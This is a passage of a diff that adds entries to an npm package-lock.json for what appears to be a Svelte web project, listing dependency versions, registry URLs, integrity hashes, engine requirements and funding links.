+ "integrity": "sha512-7RUKfXgSMMkzt6ZuXmqapOurLGPPfgj6l9uRZ7lRGolvk0y2yocc35LdcxKC5PQZdn2DMqioAQ2NoWcrTKmm6g==",
+ "dependencies": {
+ "@types/estree": "^1.0.0"
+ }
+ },
+ "node_modules/fast-glob": {
+ "version": "3.3.2",
+ "resolved": "https://registry.npmjs.org/fast-glob/-/fast-glob-3.3.2.tgz",
+ "integrity": "sha512-oX2ruAFQwf/Orj8m737Y5adxDQO0LAB7/S5MnxCdTNDd4p6BsyIVsv9JQsATbTSq8KHRpLwIHbVlUNatxd+1Ow==",
+ "dev": true,
+ "dependencies": {
+ "@nodelib/fs.stat": "^2.0.2",
+ "@nodelib/fs.walk": "^1.2.3",
+ "glob-parent": "^5.1.2",
+ "merge2": "^1.3.0",
+ "micromatch": "^4.0.4"
+ },
+ "engines": {
+ "node": ">=8.6.0"
+ }
+ },
+ "node_modules/fastq": {
+ "version": "1.15.0",
+ "resolved": "https://registry.npmjs.org/fastq/-/fastq-1.15.0.tgz",
+ "integrity": "sha512-wBrocU2LCXXa+lWBt8RoIRD89Fi8OdABODa/kEnyeyjS5aZO5/GNvI5sEINADqP/h8M29UHTHUb53sUu5Ihqdw==",
+ "dev": true,
+ "dependencies": {
+ "reusify": "^1.0.4"
+ }
+ },
+ "node_modules/fill-range": {
+ "version": "7.0.1",
+ "resolved": "https://registry.npmjs.org/fill-range/-/fill-range-7.0.1.tgz",
+ "integrity": "sha512-qOo9F+dMUmC2Lcb4BbVvnKJxTPjCm+RRpe4gDuGrzkL7mEVl/djYSu2OdQ2Pa302N4oqkSg9ir6jaLWJ2USVpQ==",
+ "dev": true,
+ "dependencies": {
+ "to-regex-range": "^5.0.1"
+ },
+ "engines": {
+ "node": ">=8"
+ }
+ },
+ "node_modules/fraction.js": {
+ "version": "4.3.7",
+ "resolved": "https://registry.npmjs.org/fraction.js/-/fraction.js-4.3.7.tgz",
+ "integrity": "sha512-ZsDfxO51wGAXREY55a7la9LScWpwv9RxIrYABrlvOFBlH/ShPnrtsXeuUIfXKKOVicNxQ+o8JTbJvjS4M89yew==",
+ "dev": true,
+ "engines": {
+ "node": "*"
+ },
+ "funding": {
+ "type": "patreon",
+ "url": "https://github.com/sponsors/rawify"
+ }
+ },
+ "node_modules/fs.realpath": {
+ "version": "1.0.0",
+ "resolved": "https://registry.npmjs.org/fs.realpath/-/fs.realpath-1.0.0.tgz",
+ "integrity": "sha512-OO0pH2lK6a0hZnAdau5ItzHPI6pUlvI7jMVnxUQRtw4owF2wk8lOSabtGDCTP4Ggrg2MbGnWO9X8K1t4+fGMDw==",
+ "dev": true
+ },
+ "node_modules/fsevents": {
+ "version": "2.3.3",
+ "resolved": "https://registry.npmjs.org/fsevents/-/fsevents-2.3.3.tgz",
+ "integrity": "sha512-5xoDfX+fL7faATnagmWPpbFtwh/R77WmMMqqHGS65C3vvB0YHrgF+B1YmZ3441tMj5n63k0212XNoJwzlhffQw==",
+ "hasInstallScript": true,
+ "optional": true,
+ "os": [
+ "darwin"
+ ],
+ "engines": {
+ "node": "^8.16.0 || ^10.6.0 || >=11.0.0"
+ }
+ },
+ "node_modules/glob": {
+ "version": "7.2.3",
+ "resolved": "https://registry.npmjs.org/glob/-/glob-7.2.3.tgz",
+ "integrity": "sha512-nFR0zLpU2YCaRxwoCJvL6UvCH2JFyFVIvwTLsIf21AuHlMskA1hhTdk+LlYJtOlYt9v6dvszD2BGRqBL+iQK9Q==",
+ "dev": true,
+ "dependencies": {
+ "fs.realpath": "^1.0.0",
+ "inflight": "^1.0.4",
+ "inherits": "2",
+ "minimatch": "^3.1.1",
+ "once": "^1.3.0",
+ "path-is-absolute": "^1.0.0"
+ },
+ "engines": {
+ "node": "*"
+ },
+ "funding": {
+ "url": "https://github.com/sponsors/isaacs"
+ }
+ },
+ "node_modules/glob-parent": {
+ "version": "5.1.2",
+ "resolved": "https://registry.npmjs.org/glob-parent/-/glob-parent-5.1.2.tgz",
+ "integrity": "sha512-AOIgSQCepiJYwP3ARnGx+5VnTu2HBYdzbGP45eLw1vr3zB3vZLeyed1sC9hnbcOc9/SrMyM5RPQrkGz4aS9Zow==",
+ "dev": true,
+ "dependencies": {
+ "is-glob": "^4.0.1"
+ },
+ "engines": {
+ "node": ">= 6"
+ }
+ },
+ "node_modules/globalyzer": {
+ "version": "0.1.0",
+ "resolved": "https://registry.npmjs.org/globalyzer/-/globalyzer-0.1.0.tgz",
+ "integrity": "sha512-40oNTM9UfG6aBmuKxk/giHn5nQ8RVz/SS4Ir6zgzOv9/qC3kKZ9v4etGTcJbEl/NyVQH7FGU7d+X1egr57Md2Q=="
+ },
+ "node_modules/globrex": {
+ "version": "0.1.2",
+ "resolved": "https://registry.npmjs.org/globrex/-/globrex-0.1.2.tgz",
+ "integrity": "sha512-uHJgbwAMwNFf5mLst7IWLNg14x1CkeqglJb/K3doi4dw6q2IvAAmM/Y81kevy83wP+Sst+nutFTYOGg3d1lsxg=="
+ },
+ "node_modules/graceful-fs": {
+ "version": "4.2.11",
+ "resolved": "https://registry.npmjs.org/graceful-fs/-/graceful-fs-4.2.11.tgz",
+ "integrity": "sha512-RbJ5/jmFcNNCcDV5o9eTnBLJ/HszWV0P73bc+Ff4nS/rJj+YaS6IGyiOL0VoBYX+l1Wrl3k63h/KrH+nhJ0XvQ==",
+ "dev": true
+ },
+ "node_modules/import-fresh": {
+ "version": "3.3.0",
+ "resolved": "https://registry.npmjs.org/import-fresh/-/import-fresh-3.3.0.tgz",
+ "integrity": "sha512-veYYhQa+D1QBKznvhUHxb8faxlrwUnxseDAbAp457E0wLNio2bOSKnjYDhMj+YiAq61xrMGhQk9iXVk5FzgQMw==",
+ "dev": true,
+ "dependencies": {
+ "parent-module": "^1.0.0",
+ "resolve-from": "^4.0.0"
+ },
+ "engines": {
+ "node": ">=6"
+ },
+ "funding": {
+ "url": "https://github.com/sponsors/sindresorhus"
+ }
+ },
+ "node_modules/import-meta-resolve": {
+ "version": "4.0.0",
+ "resolved": "https://registry.npmjs.org/import-meta-resolve/-/import-meta-resolve-4.0.0.tgz",
+ "integrity": "sha512-okYUR7ZQPH+efeuMJGlq4f8ubUgO50kByRPyt/Cy1Io4PSRsPjxME+YlVaCOx+NIToW7hCsZNFJyTPFFKepRSA==",
+ "dev": true,
+ "funding": {
+ "type": "github",
+ "url": "https://github.com/sponsors/wooorm"
+ }
+ },
+ "node_modules/inflight": {
+ "version": "1.0.6",
+ "resolved": "https://registry.npmjs.org/inflight/-/inflight-1.0.6.tgz",
+ "integrity": "sha512-k92I/b08q4wvFscXCLvqfsHCrjrF7yiXsQuIVvVE7N82W3+aqpzuUdBbfhWcy/FZR3/4IgflMgKLOsvPDrGCJA==",
+ "dev": true,
+ "dependencies": {
+ "once": "^1.3.0",
+ "wrappy": "1"
+ }
+ },
+ "node_modules/inherits": {
+ "version": "2.0.4",
+ "resolved": "https://registry.npmjs.org/inherits/-/inherits-2.0.4.tgz",
+ "integrity": "sha512-k/vGaX4/Yla3WzyMCvTQOXYeIHvqOKtnqBduzTHpzpQZzAskKMhZ2K+EnBiSM9zGSoIFeMpXKxa4dYeZIQqewQ==",
+ "dev": true
+ },
+ "node_modules/is-binary-path": {
+ "version": "2.1.0",
+ "resolved": "https://registry.npmjs.org/is-binary-path/-/is-binary-path-2.1.0.tgz",
+ "integrity": "sha512-ZMERYes6pDydyuGidse7OsHxtbI7WVeUEozgR/g7rd0xUimYNlvZRE/K2MgZTjWy725IfelLeVcEM97mmtRGXw==",
+ "dev": true,
+ "dependencies": {
+ "binary-extensions": "^2.0.0"
+ },
+ "engines": {
+ "node": ">=8"
+ }
+ },
+ "node_modules/is-extglob": {
+ "version": "2.1.1",
+ "resolved": "https://registry.npmjs.org/is-extglob/-/is-extglob-2.1.1.tgz",
+ "integrity": "sha512-SbKbANkN603Vi4jEZv49LeVJMn4yGwsbzZworEoyEiutsN3nJYdbO36zfhGJ6QEDpOZIFkDtnq5JRxmvl3jsoQ==",
+ "dev": true,
+ "engines": {
+ "node": ">=0.10.0"
+ }
+ },
+ "node_modules/is-glob": {
+ "version": "4.0.3",
+ "resolved": "https://registry.npmjs.org/is-glob/-/is-glob-4.0.3.tgz",
+ "integrity": "sha512-xelSayHH36ZgE7ZWhli7pW34hNbNl8Ojv5KVmkJD4hBdD3th8Tfk9vYasLM+mXWOZhFkgZfxhLSnrwRr4elSSg==",
+ "dev": true,
+ "dependencies": {
+ "is-extglob": "^2.1.1"
+ },
+ "engines": {
+ "node": ">=0.10.0"
+ }
+ },
+ "node_modules/is-number": {
+ "version": "7.0.0",
+ "resolved": "https://registry.npmjs.org/is-number/-/is-number-7.0.0.tgz",
+ "integrity": "sha512-41Cifkg6e8TylSpdtTpeLVMqvSBEVzTttHvERD741+pnZ8ANv0004MRL43QKPDlK9cGvNp6NZWZUBlbGXYxxng==",
+ "dev": true,
+ "engines": {
+ "node": ">=0.12.0"
+ }
+ },
+ "node_modules/is-reference": {
+ "version": "3.0.2",
+ "resolved": "https://registry.npmjs.org/is-reference/-/is-reference-3.0.2.tgz",
+ "integrity": "sha512-v3rht/LgVcsdZa3O2Nqs+NMowLOxeOm7Ay9+/ARQ2F+qEoANRcqrjAZKGN0v8ymUetZGgkp26LTnGT7H0Qo9Pg==",
+ "dependencies": {
+ "@types/estree": "*"
+ }
+ },
+ "node_modules/kleur": {
+ "version": "4.1.5",
+ "resolved": "https://registry.npmjs.org/kleur/-/kleur-4.1.5.tgz",
+ "integrity": "sha512-o+NO+8WrRiQEE4/7nwRJhN1HWpVmJm511pBHUxPLtp0BUISzlBplORYSmTclCnJvQq2tKu/sgl3xVpkc7ZWuQQ==",
+ "engines": {
+ "node": ">=6"
+ }
+ },
+ "node_modules/leaflet": {
+ "version": "1.9.4",
+ "resolved": "https://registry.npmjs.org/leaflet/-/leaflet-1.9.4.tgz",
+ "integrity": "sha512-nxS1ynzJOmOlHp+iL3FyWqK89GtNL8U8rvlMOsQdTTssxZwCXh8N2NB3GDQOL+YR3XnWyZAxwQixURb+FA74PA=="
+ },
+ "node_modules/locate-character": {
+ "version": "3.0.0",
+ "resolved": "https://registry.npmjs.org/locate-character/-/locate-character-3.0.0.tgz",
+ "integrity": "sha512-SW13ws7BjaeJ6p7Q6CO2nchbYEc3X3J6WrmTTDto7yMPqVSZTUyY5Tjbid+Ab8gLnATtygYtiDIJGQRRn2ZOiA=="
+ },
+ "node_modules/magic-string": {
+ "version": "0.30.5",
+ "resolved": "https://registry.npmjs.org/magic-string/-/magic-string-0.30.5.tgz",
+ "integrity": "sha512-7xlpfBaQaP/T6Vh8MO/EqXSW5En6INHEvEXQiuff7Gku0PWjU3uf6w/j9o7O+SpB5fOAkrI5HeoNgwjEO0pFsA==",
+ "dependencies": {
+ "@jridgewell/sourcemap-codec": "^1.4.15"
+ },
+ "engines": {
+ "node": ">=12"
+ }
+ },
+ "node_modules/mdn-data": {
+ "version": "2.0.30",
+ "resolved": "https://registry.npmjs.org/mdn-data/-/mdn-data-2.0.30.tgz",
+ "integrity": "sha512-GaqWWShW4kv/G9IEucWScBx9G1/vsFZZJUO+tD26M8J8z3Kw5RDQjaoZe03YAClgeS/SWPOcb4nkFBTEi5DUEA=="
+ },
+ "node_modules/merge2": {
+ "version": "1.4.1",
+ "resolved": "https://registry.npmjs.org/merge2/-/merge2-1.4.1.tgz",
+ "integrity": "sha512-8q7VEgMJW4J8tcfVPy8g09NcQwZdbwFEqhe/WZkoIzjn/3TGDwtOCYtXGxA3O8tPzpczCCDgv+P2P5y00ZJOOg==",
+ "dev": true,
+ "engines": {
+ "node": ">= 8"
+ }
+ },
+ "node_modules/micromatch": {
+ "version": "4.0.5",
+ "resolved": "https://registry.npmjs.org/micromatch/-/micromatch-4.0.5.tgz",
+ "integrity": "sha512-DMy+ERcEW2q8Z2Po+WNXuw3c5YaUSFjAO5GsJqfEl7UjvtIuFKO6ZrKvcItdy98dwFI2N1tg3zNIdKaQT+aNdA==",
+ "dev": true,
+ "dependencies": {
+ "braces": "^3.0.2",
+ "picomatch": "^2.3.1"
+ },
+ "engines": {
+ "node": ">=8.6"
+ }
+ },
+ "node_modules/min-indent": {
+ "version": "1.0.1",
+ "resolved": "https://registry.npmjs.org/min-indent/-/min-indent-1.0.1.tgz",
+ "integrity": "sha512-I9jwMn07Sy/IwOj3zVkVik2JTvgpaykDZEigL6Rx6N9LbMywwUSMtxET+7lVoDLLd3O3IXwJwvuuns8UB/HeAg==",
+ "dev": true,
+ "engines": {
+ "node": ">=4"
+ }
+ },
+ "node_modules/minimatch": {
+ "version": "3.1.2",
+ "resolved": "https://registry.npmjs.org/minimatch/-/minimatch-3.1.2.tgz",
+ "integrity": "sha512-J7p63hRiAjw1NDEww1W7i37+ByIrOWO5XQQAzZ3VOcL0PNybwpfmV/N05zFAzwQ9USyEcX6t3UO+K5aqBQOIHw==",
+ "dev": true,
+ "dependencies": {
+ "brace-expansion": "^1.1.7"
+ },
+ "engines": {
+ "node": "*"
+ }
+ },
+ "node_modules/minimist": {
+ "version": "1.2.8",
+ "resolved": "https://registry.npmjs.org/minimist/-/minimist-1.2.8.tgz",
+ "integrity": "sha512-2yyAR8qBkN3YuheJanUpWC5U3bb5osDywNB8RzDVlDwDHbocAJveqqj1u8+SVD7jkWT4yvsHCpWqqWqAxb0zCA==",
+ "dev": true,
+ "funding": {
+ "url": "https://github.com/sponsors/ljharb"
+ }
+ },
+ "node_modules/mkdirp": {
+ "version": "0.5.6",
+ "resolved": "https://registry.npmjs.org/mkdirp/-/mkdirp-0.5.6.tgz",
+ "integrity": "sha512-FP+p8RB8OWpF3YZBCrP5gtADmtXApB5AMLn+vdyA+PyxCjrCs00mjyUozssO33cwDeT3wNGdLxJ5M//YqtHAJw==",
+ "dev": true,
+ "dependencies": {
+ "minimist": "^1.2.6"
+ },
+ "bin": {
+ "mkdirp": "bin/cmd.js"
+ }
+ },
+ "node_modules/mri": {
+ "version": "1.2.0",
+ "resolved": "https://registry.npmjs.org/mri/-/mri-1.2.0.tgz",
+ "integrity": "sha512-tzzskb3bG8LvYGFF/mDTpq3jpI6Q9wc3LEmBaghu+DdCssd1FakN7Bc0hVNmEyGq1bq3RgfkCb3cmQLpNPOroA==",
+ "engines": {
+ "node": ">=4"
+ }
+ },
+ "node_modules/mrmime": {
+ "version": "1.0.1",
+ "resolved": "https://registry.npmjs.org/mrmime/-/mrmime-1.0.1.tgz",
+ "integrity": "sha512-hzzEagAgDyoU1Q6yg5uI+AorQgdvMCur3FcKf7NhMKWsaYg+RnbTyHRa/9IlLF9rf455MOCtcqqrQQ83pPP7Uw==",
+ "engines": {
+ "node": ">=10"
+ }
+ },
+ "node_modules/ms": {
+ "version": "2.1.2",
+ "resolved": "https://registry.npmjs.org/ms/-/ms-2.1.2.tgz",
+ "integrity": "sha512-sGkPx+VjMtmA6MX27oA4FBFELFCZZ4S4XqeGOXCv68tT+jb3vk/RyaKWP0PTKyWtmLSM0b+adUTEvbs1PEaH2w=="
+ },
+ "node_modules/nanoid": {
+ "version": "3.3.7",
+ "resolved": "https://registry.npmjs.org/nanoid/-/nanoid-3.3.7.tgz",
+ "integrity": "sha512-eSRppjcPIatRIMC1U6UngP8XFcz8MQWGQdt1MTBQ7NaAmvXDfvNxbvWV3x2y6CdEUciCSsDHDQZbhYaB8QEo2g==",
+ "funding": [
+ {
+ "type": "github",
+ "url": "https://github.com/sponsors/ai"
+ }
+ ],
+ "bin": {
+ "nanoid": "bin/nanoid.cjs"
+ },
+ "engines": {
+ "node": "^10 || ^12 || ^13.7 || ^14 || >=15.0.1"
+ }
+ },
+ "node_modules/node-releases": {
+ "version": "2.0.13",
+ "resolved": "https://registry.npmjs.org/node-releases/-/node-releases-2.0.13.tgz",
+ "integrity": "sha512-uYr7J37ae/ORWdZeQ1xxMJe3NtdmqMC/JZK+geofDrkLUApKRHPd18/TxtBOJ4A0/+uUIliorNrfYV6s1b02eQ==",
+ "dev": true
+ },
+ "node_modules/normalize-path": {
+ "version": "3.0.0",
+ "resolved": "https://registry.npmjs.org/normalize-path/-/normalize-path-3.0.0.tgz",
+ "integrity": "sha512-6eZs5Ls3WtCisHWp9S2GUy8dqkpGi4BVSz3GaqiE6ezub0512ESztXUwUB6C6IKbQkY2Pnb/mD4WYojCRwcwLA==",
+ "dev": true,
+ "engines": {
+ "node": ">=0.10.0"
+ }
+ },
+ "node_modules/normalize-range": {
+ "version": "0.1.2",
+ "resolved": "https://registry.npmjs.org/normalize-range/-/normalize-range-0.1.2.tgz",
+ "integrity": "sha512-bdok/XvKII3nUpklnV6P2hxtMNrCboOjAcyBuQnWEhO665FwrSNRxU+AqpsyvO6LgGYPspN+lu5CLtw4jPRKNA==",
+ "dev": true,
+ "engines": {
+ "node": ">=0.10.0"
+ }
+ },
+ "node_modules/once": {
+ "version": "1.4.0",
+ "resolved": "https://registry.npmjs.org/once/-/once-1.4.0.tgz",
+ "integrity": "sha512-lNaJgI+2Q5URQBkccEKHTQOPaXdUxnZZElQTZY0MFUAuaEqe1E+Nyvgdz/aIyNi6Z9MzO5dv1H8n58/GELp3+w==",
+ "dev": true,
+ "dependencies": {
+ "wrappy": "1"
+ }
+ },
+ "node_modules/parent-module": {
+ "version": "1.0.1",
+ "resolved": "https://registry.npmjs.org/parent-module/-/parent-module-1.0.1.tgz",
+ "integrity": "sha512-GQ2EWRpQV8/o+Aw8YqtfZZPfNRWZYkbidE9k5rpl/hC3vtHHBfGm2Ifi6qWV+coDGkrUKZAxE3Lot5kcsRlh+g==",
+ "dev": true,
+ "dependencies": {
+ "callsites": "^3.0.0"
+ },
+ "engines": {
+ "node": ">=6"
+ }
+ },
+ "node_modules/path-is-absolute": {
+ "version": "1.0.1",
+ "resolved": "https://registry.npmjs.org/path-is-absolute/-/path-is-absolute-1.0.1.tgz",
+ "integrity": "sha512-AVbw3UJ2e9bq64vSaS9Am0fje1Pa8pbGqTTsmXfaIiMpnr5DlDhfJOuLj9Sf95ZPVDAUerDfEk88MPmPe7UCQg==",
+ "dev": true,
+ "engines": {
+ "node": ">=0.10.0"
+ }
+ },
+ "node_modules/periscopic": {
+ "version": "3.1.0",
+ "resolved": "https://registry.npmjs.org/periscopic/-/periscopic-3.1.0.tgz",
+ "integrity": "sha512-vKiQ8RRtkl9P+r/+oefh25C3fhybptkHKCZSPlcXiJux2tJF55GnEj3BVn4A5gKfq9NWWXXrxkHBwVPUfH0opw==",
+ "dependencies": {
+ "@types/estree": "^1.0.0",
+ "estree-walker": "^3.0.0",
+ "is-reference": "^3.0.0"
+ }
+ },
+ "node_modules/picocolors": {
+ "version": "1.0.0",
+ "resolved": "https://registry.npmjs.org/picocolors/-/picocolors-1.0.0.tgz",
+ "integrity": "sha512-1fygroTLlHu66zi26VoTDv8yRgm0Fccecssto+MhsZ0D/DGW2sm8E8AjW7NU5VVTRt5GxbeZ5qBuJr+HyLYkjQ=="
+ },
+ "node_modules/picomatch": {
+ "version": "2.3.1",
+ "resolved": "https://registry.npmjs.org/picomatch/-/picomatch-2.3.1.tgz",
+ "integrity": "sha512-JU3teHTNjmE2VCGFzuY8EXzCDVwEqB2a8fsIvwaStHhAWJEeVd1o1QD80CU6+ZdEXXSLbSsuLwJjkCBWqRQUVA==",
+ "dev": true,
+ "engines": {
+ "node": ">=8.6"
+ },
+ "funding": {
+ "url": "https://github.com/sponsors/jonschlinkert"
+ }
+ },
+ "node_modules/postcss": {
+ "version": "8.4.31",
+ "resolved": "https://registry.npmjs.org/postcss/-/postcss-8.4.31.tgz",
+ "integrity": "sha512-PS08Iboia9mts/2ygV3eLpY5ghnUcfLV/EXTOW1E2qYxJKGGBUtNjN76FYHnMs36RmARn41bC0AZmn+rR0OVpQ==",
+ "funding": [
+ {
+ "type": "opencollective",
+ "url": "https://opencollective.com/postcss/"
+ },
+ {
+ "type": "tidelift",
+ "url": "https://tidelift.com/funding/github/npm/postcss"
+ },
+ {
+ "type": "github",
+ "url": "https://github.com/sponsors/ai"
+ }
+ ],
+ "dependencies": {
+ "nanoid": "^3.3.6",
+ "picocolors": "^1.0.0",
+ "source-map-js": "^1.0.2"
+ },
+ "engines": {
+ "node": "^10 || ^12 || >=14"
+ }
+ },
+ "node_modules/postcss-load-config": {
+ "version": "4.0.2",
+ "resolved": "https://registry.npmjs.org/postcss-load-config/-/postcss-load-config-4.0.2.tgz",
+ "integrity": "sha512-bSVhyJGL00wMVoPUzAVAnbEoWyqRxkjv64tUl427SKnPrENtq6hJwUojroMz2VB+Q1edmi4IfrAPpami5VVgMQ==",
+ "dev": true,
+ "funding": [
+ {
+ "type": "opencollective",
+ "url": "https://opencollective.com/postcss/"
+ },
+ {
+ "type": "github",
+ "url": "https://github.com/sponsors/ai"
+ }
+ ],
+ "optional": true,
+ "peer": true,
+ "dependencies": {
+ "lilconfig": "^3.0.0",
+ "yaml": "^2.3.4"
+ },
+ "engines": {
+ "node": ">= 14"
+ },
+ "peerDependencies": {
+ "postcss": ">=8.0.9",
+ "ts-node": ">=9.0.0"
+ },
+ "peerDependenciesMeta": {
+ "postcss": {
+ "optional": true
+ },
+ "ts-node": {
+ "optional": true
+ }
+ }
+ },
+ "node_modules/postcss-load-config/node_modules/lilconfig": {
+ "version": "3.0.0",
+ "resolved": "https://registry.npmjs.org/lilconfig/-/lilconfig-3.0.0.tgz",
+ "integrity": "sha512-K2U4W2Ff5ibV7j7ydLr+zLAkIg5JJ4lPn1Ltsdt+Tz/IjQ8buJ55pZAxoP34lqIiwtF9iAvtLv3JGv7CAyAg+g==",
+ "dev": true,
+ "optional": true,
+ "peer": true,
+ "engines": {
+ "node": ">=14"
+ }
+ },
+ "node_modules/postcss-value-parser": {
+ "version": "4.2.0",
+ "resolved": "https://registry.npmjs.org/postcss-value-parser/-/postcss-value-parser-4.2.0.tgz",
+ "integrity": "sha512-1NNCs6uurfkVbeXG4S8JFT9t19m45ICnif8zWLd5oPSZ50QnwMfK+H3jv408d4jw/7Bttv5axS5IiHoLaVNHeQ==",
+ "dev": true
+ },
+ "node_modules/queue-microtask": {
+ "version": "1.2.3",
+ "resolved": "https://registry.npmjs.org/queue-microtask/-/queue-microtask-1.2.3.tgz",
+ "integrity": "sha512-NuaNSa6flKT5JaSYQzJok04JzTL1CA6aGhv5rfLW3PgqA+M2ChpZQnAC8h8i4ZFkBS8X5RqkDBHA7r4hej3K9A==",
+ "dev": true,
+ "funding": [
+ {
+ "type": "github",
+ "url": "https://github.com/sponsors/feross"
+ },
+ {
+ "type": "patreon",
+ "url": "https://www.patreon.com/feross"
+ },
+ {
+ "type": "consulting",
+ "url": "https://feross.org/support"
+ }
+ ]
+ },
+ "node_modules/readdirp": {
+ "version": "3.6.0",
+ "resolved": "https://registry.npmjs.org/readdirp/-/readdirp-3.6.0.tgz",
+ "integrity": "sha512-hOS089on8RduqdbhvQ5Z37A0ESjsqz6qnRcffsMU3495FuTdqSm+7bhJ29JvIOsBDEEnan5DPu9t3To9VRlMzA==",
+ "dev": true,
+ "dependencies": {
+ "picomatch": "^2.2.1"
+ },
+ "engines": {
+ "node": ">=8.10.0"
+ }
+ },
+ "node_modules/resolve-from": {
+ "version": "4.0.0",
+ "resolved": "https://registry.npmjs.org/resolve-from/-/resolve-from-4.0.0.tgz",
+ "integrity": "sha512-pb/MYmXstAkysRFx8piNI1tGFNQIFA3vkE3Gq4EuA1dF6gHp/+vgZqsCGJapvy8N3Q+4o7FwvquPJcnZ7RYy4g==",
+ "dev": true,
+ "engines": {
+ "node": ">=4"
+ }
+ },
+ "node_modules/reusify": {
+ "version": "1.0.4",
+ "resolved": "https://registry.npmjs.org/reusify/-/reusify-1.0.4.tgz",
+ "integrity": "sha512-U9nH88a3fc/ekCF1l0/UP1IosiuIjyTh7hBvXVMHYgVcfGvt897Xguj2UOLDeI5BG2m7/uwyaLVT6fbtCwTyzw==",
+ "dev": true,
+ "engines": {
+ "iojs": ">=1.0.0",
+ "node": ">=0.10.0"
+ }
+ },
+ "node_modules/rimraf": {
+ "version": "2.7.1",
+ "resolved": "https://registry.npmjs.org/rimraf/-/rimraf-2.7.1.tgz",
+ "integrity": "sha512-uWjbaKIK3T1OSVptzX7Nl6PvQ3qAGtKEtVRjRuazjfL3Bx5eI409VZSqgND+4UNnmzLVdPj9FqFJNPqBZFve4w==",
+ "dev": true,
+ "dependencies": {
+ "glob": "^7.1.3"
+ },
+ "bin": {
+ "rimraf": "bin.js"
+ }
+ },
+ "node_modules/rollup": {
+ "version": "3.29.4",
+ "resolved": "https://registry.npmjs.org/rollup/-/rollup-3.29.4.tgz",
+ "integrity": "sha512-oWzmBZwvYrU0iJHtDmhsm662rC15FRXmcjCk1xD771dFDx5jJ02ufAQQTn0etB2emNk4J9EZg/yWKpsn9BWGRw==",
+ "bin": {
+ "rollup": "dist/bin/rollup"
+ },
+ "engines": {
+ "node": ">=14.18.0",
+ "npm": ">=8.0.0"
+ },
+ "optionalDependencies": {
+ "fsevents": "~2.3.2"
+ }
+ },
+ "node_modules/run-parallel": {
+ "version": "1.2.0",
+ "resolved": "https://registry.npmjs.org/run-parallel/-/run-parallel-1.2.0.tgz",
+ "integrity": "sha512-5l4VyZR86LZ/lDxZTR6jqL8AFE2S0IFLMP26AbjsLVADxHdhB/c0GUsH+y39UfCi3dzz8OlQuPmnaJOMoDHQBA==",
+ "dev": true,
+ "funding": [
+ {
+ "type": "github",
+ "url": "https://github.com/sponsors/feross"
+ },
+ {
+ "type": "patreon",
+ "url": "https://www.patreon.com/feross"
+ },
+ {
+ "type": "consulting",
+ "url": "https://feross.org/support"
+ }
+ ],
+ "dependencies": {
+ "queue-microtask": "^1.2.2"
+ }
+ },
+ "node_modules/sade": {
+ "version": "1.8.1",
+ "resolved": "https://registry.npmjs.org/sade/-/sade-1.8.1.tgz",
+ "integrity": "sha512-xal3CZX1Xlo/k4ApwCFrHVACi9fBqJ7V+mwhBsuf/1IOKbBy098Fex+Wa/5QMubw09pSZ/u8EY8PWgevJsXp1A==",
+ "dependencies": {
+ "mri": "^1.1.0"
+ },
+ "engines": {
+ "node": ">=6"
+ }
+ },
+ "node_modules/sander": {
+ "version": "0.5.1",
+ "resolved": "https://registry.npmjs.org/sander/-/sander-0.5.1.tgz",
+ "integrity": "sha512-3lVqBir7WuKDHGrKRDn/1Ye3kwpXaDOMsiRP1wd6wpZW56gJhsbp5RqQpA6JG/P+pkXizygnr1dKR8vzWaVsfA==",
+ "dev": true,
+ "dependencies": {
+ "es6-promise": "^3.1.2",
+ "graceful-fs": "^4.1.3",
+ "mkdirp": "^0.5.1",
+ "rimraf": "^2.5.2"
+ }
+ },
+ "node_modules/set-cookie-parser": {
+ "version": "2.6.0",
+ "resolved": "https://registry.npmjs.org/set-cookie-parser/-/set-cookie-parser-2.6.0.tgz",
+ "integrity": "sha512-RVnVQxTXuerk653XfuliOxBP81Sf0+qfQE73LIYKcyMYHG94AuH0kgrQpRDuTZnSmjpysHmzxJXKNfa6PjFhyQ=="
+ },
+ "node_modules/sirv": {
+ "version": "2.0.3",
+ "resolved": "https://registry.npmjs.org/sirv/-/sirv-2.0.3.tgz",
+ "integrity": "sha512-O9jm9BsID1P+0HOi81VpXPoDxYP374pkOLzACAoyUQ/3OUVndNpsz6wMnY2z+yOxzbllCKZrM+9QrWsv4THnyA==",
+ "dependencies": {
+ "@polka/url": "^1.0.0-next.20",
+ "mrmime": "^1.0.0",
+ "totalist": "^3.0.0"
+ },
+ "engines": {
+ "node": ">= 10"
+ }
+ },
+ "node_modules/sorcery": {
+ "version": "0.11.0",
+ "resolved": "https://registry.npmjs.org/sorcery/-/sorcery-0.11.0.tgz",
+ "integrity": "sha512-J69LQ22xrQB1cIFJhPfgtLuI6BpWRiWu1Y3vSsIwK/eAScqJxd/+CJlUuHQRdX2C9NGFamq+KqNywGgaThwfHw==",
+ "dev": true,
+ "dependencies": {
+ "@jridgewell/sourcemap-codec": "^1.4.14",
+ "buffer-crc32": "^0.2.5",
+ "minimist": "^1.2.0",
+ "sander": "^0.5.0"
+ },
+ "bin": {
+ "sorcery": "bin/sorcery"
+ }
+ },
+ "node_modules/source-map-js": {
+ "version": "1.0.2",
+ "resolved": "https://registry.npmjs.org/source-map-js/-/source-map-js-1.0.2.tgz",
+ "integrity": "sha512-R0XvVJ9WusLiqTCEiGCmICCMplcCkIwwR11mOSD9CR5u+IXYdiseeEuXCVAjS54zqwkLcPNnmU4OeJ6tUrWhDw==",
+ "engines": {
+ "node": ">=0.10.0"
+ }
+ },
+ "node_modules/strip-indent": {
+ "version": "3.0.0",
+ "resolved": "https://registry.npmjs.org/strip-indent/-/strip-indent-3.0.0.tgz",
+ "integrity": "sha512-laJTa3Jb+VQpaC6DseHhF7dXVqHTfJPCRDaEbid/drOhgitgYku/letMUqOXFoWV0zIIUbjpdH2t+tYj4bQMRQ==",
+ "dev": true,
+ "dependencies": {
+ "min-indent": "^1.0.0"
+ },
+ "engines": {
+ "node": ">=8"
+ }
+ },
+ "node_modules/svelte": {
+ "version": "4.2.7",
+ "resolved": "https://registry.npmjs.org/svelte/-/svelte-4.2.7.tgz",
+ "integrity": "sha512-UExR1KS7raTdycsUrKLtStayu4hpdV3VZQgM0akX8XbXgLBlosdE/Sf3crOgyh9xIjqSYB3UEBuUlIQKRQX2hg==",
+ "dependencies": {
+ "@ampproject/remapping": "^2.2.1",
+ "@jridgewell/sourcemap-codec": "^1.4.15",
+ "@jridgewell/trace-mapping": "^0.3.18",
+ "acorn": "^8.9.0",
+ "aria-query": "^5.3.0",
+ "axobject-query": "^3.2.1",
+ "code-red": "^1.0.3",
+ "css-tree": "^2.3.1",
+ "estree-walker": "^3.0.3",
+ "is-reference": "^3.0.1",
